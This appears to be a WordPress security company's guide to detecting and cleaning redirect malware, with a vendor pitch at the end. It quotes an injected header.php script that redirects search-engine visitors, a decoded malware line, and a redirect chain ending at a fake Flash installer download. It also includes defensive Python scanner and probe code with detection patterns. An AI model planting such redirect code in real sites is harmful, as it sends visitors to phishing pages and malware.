WordPress Malware Redirect Hack ☠️ How To Detect & Fix It


WordPress Redirect Hack – Malware Removal & Cleanup 🚨

 TABLE OF CONTENTS:

📒 Does Your WordPress Website Redirect To a Spammy Site?

📒 What is WordPress Malware Redirect Hack?

📒 Instances Of Malicious Code Inserted in WordPress Sites

📒 How to Detect and Clean WordPress Redirect Hack?

📒 How to Protect your site from WordPress Malware Redirects?

📒 WordPress Malware Cleanup Service – WP Hacked Help

Does Your WordPress Website Redirect to a Spammy Site?

No one is 100% safe from having their website hacked (⚠️even the FBI’s website gets hacked). Hacking is common, yet it is one of the most devastating experiences for website owners.

These hackers may extract money, data and confidential information from your website. If your website is being redirected to phishing or malware websites, be ready for the consequences.

Google is not going to take any chances with its reputation, so you are definitely going to be penalized by Google, and your website may get blacklisted. It is therefore very important to know what should be done right away when you see your site being redirected to phishing or malware websites.

What is WordPress Malware Redirect Hack?

A 🚨 “WordPress Malware Redirect”, or “WordPress Redirect Hack” as it is commonly called, is a hack where your site visitors are automatically redirected to malicious websites, phishing pages and malware websites. It is likely due to code injected into your WordPress database, which leads your WordPress site to redirect to another site.

Generally, a 🔴 malicious WordPress redirect is detected through the site’s front end, when a visitor is redirected to another page instead of the page or website they requested. In most cases hackers use a particular script to redirect the website to a porn or scam website, harming your website and putting its popularity at stake. Commonly used tricks to change the website’s redirection include:

  • Adding themselves as a ghost admin on your website
  • Injecting or uploading malicious code to your WordPress site
  • Executing .php code

If a malicious script is added by hackers, it is often named to look like a legitimate file, as if it were part of the WordPress core files on the website. Hackers can add malicious code to the wp-content/plugins or wp-content/uploads folders, .htaccess, wp-includes, wp-content/themes, or the wp-config.php file.

Instances of Malicious Code Inserted in WordPress Sites

If your WordPress website is infected with malicious redirects, check the following areas for suspicious code:

  • Core WordPress Files
  • index.php
  • index.html
  • .htaccess file
  • theme files
  • header.php (in the themes folder)
  • footer.php (in the themes folder)
  • functions.php (in the themes folder)

Below are a few instances of malicious code that resulted in visitors being randomly redirected to malicious sites on hacked WordPress sites.

Header.php Injection

In general, malicious code of 10 to 12 lines is inserted into the header.php of the WordPress website.

When this code is decoded, the main part of the malware looks somewhat like this:

[Image: decoded malware code]

There is a logic behind the code. If it is the visitor’s first visit, the code simply redirects them to default7 .com and sets the 896diC9OFnqeAcKGN7fW cookie for approximately 1 year to track returning visitors.

  • Malicious code inserted in footer
  • Malicious code inserted in themes header.php file

Malicious code

echo'<script>var s = document.referrer;if (s.indexOf("google") > 0 || s.indexOf("bing") > 0 || s.indexOf("yahoo") > 0 || s.indexOf("aol") > 0) {  self.location = \'http://yee****boost**750***sale*.com/\';}</script > '; ?>

Depending on the browser and IP, a user can be redirected to any random domain listed below:

  • test0 .com
  • distinctfestive .com
  • default7 .com
  • ableoccassion .com
  • test246 .com
  • 404.php

  • Bugs in the Malware

This malware has various other effects that are caused by a few obvious bugs in the malicious code.

For example, see line 9 of the decoded version:

if ($_GET['6FoNxbvo73BHOjhxokW3'] !== NULL) {

For some reason the malware checks for the 6FoNxbvo73BHOjhxokW3 parameter and generally does nothing if a GET request contains it. That is not a problem in itself. The problem is that the code doesn’t make sure such a parameter exists before checking its value. In PHP, this causes a notice like this:

Notice: Undefined index: 6FoNxbvo73BHOjhxokW3 in /home/account/public_html/wp-content/themes/currenttheme/header.php(8) : eval()'d code on line 9

  • Fake Updates for Internet Explorer Users

[Screenshot: fake Adobe Flash update page]

A strange case is Internet Explorer: when you use it, the redirect chain may look somewhat like this:

default7 .com
-> advertisementexample .com/d/p/test246.com?k=e88965c228fb1da3ff5ecff0d3034e7a.1462363771.823.1&r=
-> maintainpc .soft2update .xyz/vtrescs?tyercv=5qe5FetFrItyco5HNTadzxMu9Nwdv__MlK_dmzyotoo.&subid=102860_bebd063b36f47778fce4592efccae37a&v_id=e5tsIAwpqr6ffJ2kShbqE1F3WXTIU4auGIx7jpVqifk.
-> intva31 .saturnlibrary .info/dl-pure/1202331/31254524/?bc=1202331&checksum=31254524&ephemeral=1&filename=adobe_flash_player.exe&cb=-1388370582&hashstring=oZy9K7h7eaHC&usefilename=true&executableroutePath=1202245&stub=true

This code leads to websites that push fake Java and Flash Player updates onto your screen. See the screenshot above for reference.

How to Detect and Clean WordPress Redirect Hack?

Steps to be taken before fixing the hack

  • Before you start fixing the WordPress malware redirect hack, ensure your website is temporarily taken offline. This gives you enough time to solve the problem and also prevents your users from visiting the hacked pages.
  • Always take a backup before making any changes to the core files and the database of the website. The backup should also contain the hacked pages, so that it can be referred to in case necessary content is accidentally removed. Also, be sure to keep a copy of all the files that you work with.
  • If you have little knowledge of the JavaScript, CMS or PHP files of your website, it is strongly recommended to consult a professional to deal with the issue.

Follow this simple 5-step guide to remove the malicious code from your WordPress website:

Scan Your WordPress Site

There are various ways of checking your site. If you find that your website has been hacked with a malicious script, you need to generate a complete backup of your website. While cleaning your site you might make a mistake, and then that backup acts as your savior. Once you have backed up your complete website, you’re ready to run a website scan using a WordPress Malware Scanner.

Find the Malicious Code

There are a number of places where malicious code can be located on your website. Scanning the code chunk by chunk in each page of your website is definitely not an easy task. There are times when the culprit is hidden somewhere on your server, and for a few places you’ll need FTP/FTPS login details to get access and start the malware cleaning process.

  • If the website is redirecting to an anonymous website(s), look for suspicious code in the following areas:
    • index.php and index.html (check both)
    • .htaccess file
  • If your website is triggering downloads for visitors, have a look at the following places:
    • header.php
    • footer.php
    • Your website’s index file (check both)
    • Your theme’s files
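An added example, not code from the original article: a small Python scanner that walks a WordPress tree, opens only the file names listed above, and flags three patterns modelled on the samples quoted on this page. The rule set, the names scan_tree and build_sample_site, and the embedded sample files are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path

# File names this page lists as common injection points.
TARGETS = {"index.php", "index.html", ".htaccess", "header.php",
           "footer.php", "functions.php", "wp-config.php", "404.php"}

# Heuristics modelled on the samples quoted on this page (assumed, not exhaustive).
RULES = {
    "eval-of-decoded-data": re.compile(
        r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "referrer-gated-js-redirect": re.compile(
        r"document\.referrer.{0,400}?(self|window|top|document)\.location\s*=",
        re.I | re.S),
    "random-20-char-request-key": re.compile(
        r"\$_(GET|COOKIE|REQUEST)\s*\[\s*['\"][A-Za-z0-9]{20}['\"]\s*\]"),
}

def scan_tree(root):
    """Return sorted (relative_path, rule_name) findings under root."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.name in TARGETS:
            text = path.read_text(errors="replace")
            rel = path.relative_to(root).as_posix()
            findings += [(rel, name) for name, rx in RULES.items() if rx.search(text)]
    return sorted(findings)

def build_sample_site(root):
    """Write a constructed mini site: one clean file and two infected theme files."""
    key = "x7" * 10  # constructed 20-character key, same shape as the one quoted above
    theme = Path(root, "wp-content/themes/currenttheme")
    theme.mkdir(parents=True)
    Path(root, "index.php").write_text("<?php require __DIR__ . '/wp-blog-header.php';\n")
    (theme / "header.php").write_text(
        "<?php eval(base64_decode('ZWNobyAxOw==')); "  # constructed, decodes to: echo 1;
        "if ($_GET['" + key + "'] !== NULL) { exit; } ?>\n")
    (theme / "footer.php").write_text(
        "<?php echo '<script>var s = document.referrer;"
        "if (s.indexOf(\"google\") > 0) { self.location = "
        "\\'http://redirect.example/\\';}</script>'; ?>\n")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, rule in scan_tree(build_sample_site(tmp)):
            print(f"{rel}: {rule}")
```

A hit is a reason to open the file and read it, not proof of infection; compare flagged core and theme files against clean copies of the same version.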

Deeper Dig in the website

It does no harm to run tests to analyse whether your website is infected with malware or malicious code. For this, you can pretend to be a particular user agent or Googlebot by using a Googlebot simulator, or you can use FETCH AS GOOGLE from the website’s webmaster console. There are also a few commands that work through an SSH client. With them you can look into the place where the hack was made and then remove the WordPress malicious code manually.

Removing Bad Code

You’ll need to remove the malicious scripts that cause the website to redirect to abusive sites. The malicious code, along with the new pages, can be removed from the search engine results by going to Google’s Search Engine Console and using the Remove URLs feature. Also, update the plugins and themes, and ensure the new core theme is installed and up to date. Change or reset the passwords.
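An added example, not part of the original article, of the check described above: request your own site as a direct visitor, as a visitor arriving from a search result, and with a Googlebot user agent, then report any profile that is sent off-site. The profile header values, the function names, and the 64 KB body limit are assumptions.

```python
import re
import urllib.error
import urllib.request
from urllib.parse import urlparse

# Request profiles for the checks described above; the header values are examples.
PROFILES = {
    "direct": {"User-Agent": "Mozilla/5.0"},
    "search-referrer": {"User-Agent": "Mozilla/5.0",
                        "Referer": "https://www.google.com/"},
    "googlebot": {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; "
                                "+http://www.google.com/bot.html)"},
}
META_REFRESH = re.compile(
    r"<meta[^>]+http-equiv=[\"']?refresh[^>]+url=([^\"'>\s]+)", re.I)

class NoFollow(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):
        return None  # surface the 3xx response instead of following it

def offsite_target(site_host, status, headers, body):
    """Return the off-site URL a response sends the visitor to, else None."""
    base = re.sub(r"^www\.", "", site_host.lower())
    candidates = META_REFRESH.findall(body)
    if 300 <= status < 400 and headers.get("location"):
        candidates.insert(0, headers["location"])
    for url in candidates:
        host = urlparse(url).hostname  # None for relative URLs
        if host and host != base and not host.endswith("." + base):
            return url
    return None

def fetch(url, headers):
    """One cookie-less GET (looks like a first visit); header names lower-cased."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.build_opener(NoFollow).open(req, timeout=10) as resp:
            hdrs, body = resp.headers, resp.read(65536).decode("utf-8", "replace")
            status = resp.status
    except urllib.error.HTTPError as err:  # unfollowed 3xx and 4xx/5xx land here
        status, hdrs, body = err.code, err.headers, ""
    return status, {k.lower(): v for k, v in hdrs.items()}, body

def probe(url):
    """Map each profile name to the off-site target it was sent to (or None)."""
    host = urlparse(url).hostname
    return {name: offsite_target(host, *fetch(url, hdrs))
            for name, hdrs in PROFILES.items()}
```

A script-based redirect such as the document.referrer sample quoted earlier runs in the browser and produces no Location header, so this check complements inspecting the files themselves and does not replace it.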

 


Submit Malware Reconsideration Request Using Search Console

Google Webmaster Tools is one of the best free tools for webmasters, and if you have not yet submitted your website to GWT, you are missing out on a lot of vital information about your website. Here I’m sharing a step-by-step guide to submitting a malware review request using Google Webmaster Tools:

  • Log in to Google Search Console
  • Verify your website ownership
  • Click on Site > Dashboard > Security issue

Here you will see a list of URLs that Google suspects are infected with malware. Once you have cleaned all hacked files and your website is malware free, simply click on Request a review and add notes describing the actions you have taken to remove the malware.

How to Protect your site from WordPress Malware Redirects?

It’s important to 📒 harden your WordPress security by following the guidelines listed below:


🛡️WordPress Malware Cleanup Service – WP Hacked Help🛡️

If you don’t have the time or the expertise to scan and clean your WordPress site after a Malware Redirect hack, we can clean it for you. This is a priority service that will restore your hacked WordPress website in a day or less. We take a 📒 WordPress database backup manually and scan your entire site to ensure all malware is deleted and all infected and vulnerable files are replaced with fresh, secure copies.

Our WordPress Malware Removal service helps to remove all malware, WordPress backdoors and Google blacklist warnings, and to protect against future attacks.

Our WordPress security services include malware removal, hack recovery, hardening, WordPress updates and more.